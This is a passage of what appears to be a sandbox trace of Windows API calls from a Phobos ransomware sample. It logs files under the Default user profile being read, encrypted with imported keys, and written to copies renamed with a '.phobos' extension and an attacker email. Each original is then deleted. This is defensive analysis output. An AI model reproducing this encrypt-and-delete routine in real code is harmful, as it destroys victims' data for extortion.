lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0209.418] CryptDestroyKey (hKey=0xa32928) returned 1 [0209.418] CloseHandle (hObject=0xac) returned 1 [0209.418] CloseHandle (hObject=0xfc) returned 1 [0209.418] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\windowsmail.pat")) returned 1 [0209.421] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0209.421] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0209.422] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=552) returned 1 [0209.422] CloseHandle (hObject=0xfc) returned 1 [0209.422] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9")) returned 0x2024 [0209.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0209.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0209.423] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0209.423] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0209.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0209.593] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0209.593] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0209.593] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x228, lpOverlapped=0x0) returned 1 [0209.594] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x230, dwBufLen=0x230 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x230) returned 1 [0209.594] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x230, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x230, lpOverlapped=0x0) returned 1 [0209.595] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0209.595] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0209.595] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0209.595] CryptDestroyKey (hKey=0xa328e8) returned 1 [0209.595] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0209.595] CryptDestroyKey (hKey=0xa32928) returned 1 [0209.595] CloseHandle (hObject=0xfc) returned 1 [0209.595] CloseHandle (hObject=0xac) returned 1 [0209.595] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9")) returned 1 [0209.596] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0209.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0209.597] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0209.597] CloseHandle (hObject=0xac) returned 1 [0209.597] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0209.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0209.597] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=260) returned 1 [0209.597] CloseHandle (hObject=0xac) returned 1 [0209.597] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9")) returned 0x2024 [0209.598] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0209.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0209.598] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0209.598] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0209.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.098] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0210.098] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.098] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x104, lpOverlapped=0x0) returned 1 [0210.099] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110, dwBufLen=0x110 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x110) returned 1 [0210.099] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x110, lpOverlapped=0x0) returned 1 [0210.099] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0210.099] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.099] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0210.100] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.100] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0210.100] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.100] CloseHandle (hObject=0xac) returned 1 [0210.100] CloseHandle (hObject=0xfc) returned 1 [0210.100] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9")) returned 1 [0210.101] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0210.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.101] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=304) returned 1 [0210.101] CloseHandle (hObject=0xfc) returned 1 [0210.102] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015")) returned 0x2024 [0210.102] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.102] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.102] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.102] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0210.103] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.103] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x130, lpOverlapped=0x0) returned 1 [0210.103] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x140, dwBufLen=0x140 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x140) returned 1 [0210.103] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x140, lpOverlapped=0x0) returned 1 [0210.104] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0210.104] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.104] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0210.104] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.104] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0210.104] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.104] CloseHandle (hObject=0xfc) returned 1 [0210.104] CloseHandle (hObject=0xac) returned 1 [0210.104] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015")) returned 1 [0210.105] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0210.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.106] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=290) returned 1 [0210.106] CloseHandle (hObject=0xac) returned 1 [0210.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk")) returned 0x20 [0210.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.106] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.106] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.107] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0210.107] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.107] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x122, lpOverlapped=0x0) returned 1 [0210.107] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x130, dwBufLen=0x130 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x130) returned 1 [0210.107] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x130, lpOverlapped=0x0) returned 1 [0210.108] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0210.108] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.108] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0210.108] CryptDestroyKey (hKey=0xa328e8) returned 1 [0210.108] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0210.108] CryptDestroyKey (hKey=0xa32928) returned 1 [0210.108] CloseHandle (hObject=0xac) returned 1 [0210.109] CloseHandle (hObject=0xfc) returned 1 [0210.109] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk")) returned 1 [0210.110] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0210.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.110] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1449) returned 1 [0210.110] CloseHandle (hObject=0xfc) returned 1 [0210.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk")) returned 0x20 [0210.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0210.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0210.111] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.111] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0210.111] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0210.111] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0210.111] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.111] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5a9, lpOverlapped=0x0) returned 1 [0210.387] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0, dwBufLen=0x5b0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5b0) returned 1 [0210.388] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5b0, lpOverlapped=0x0) returned 1 [0210.388] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0210.389] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0210.389] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, 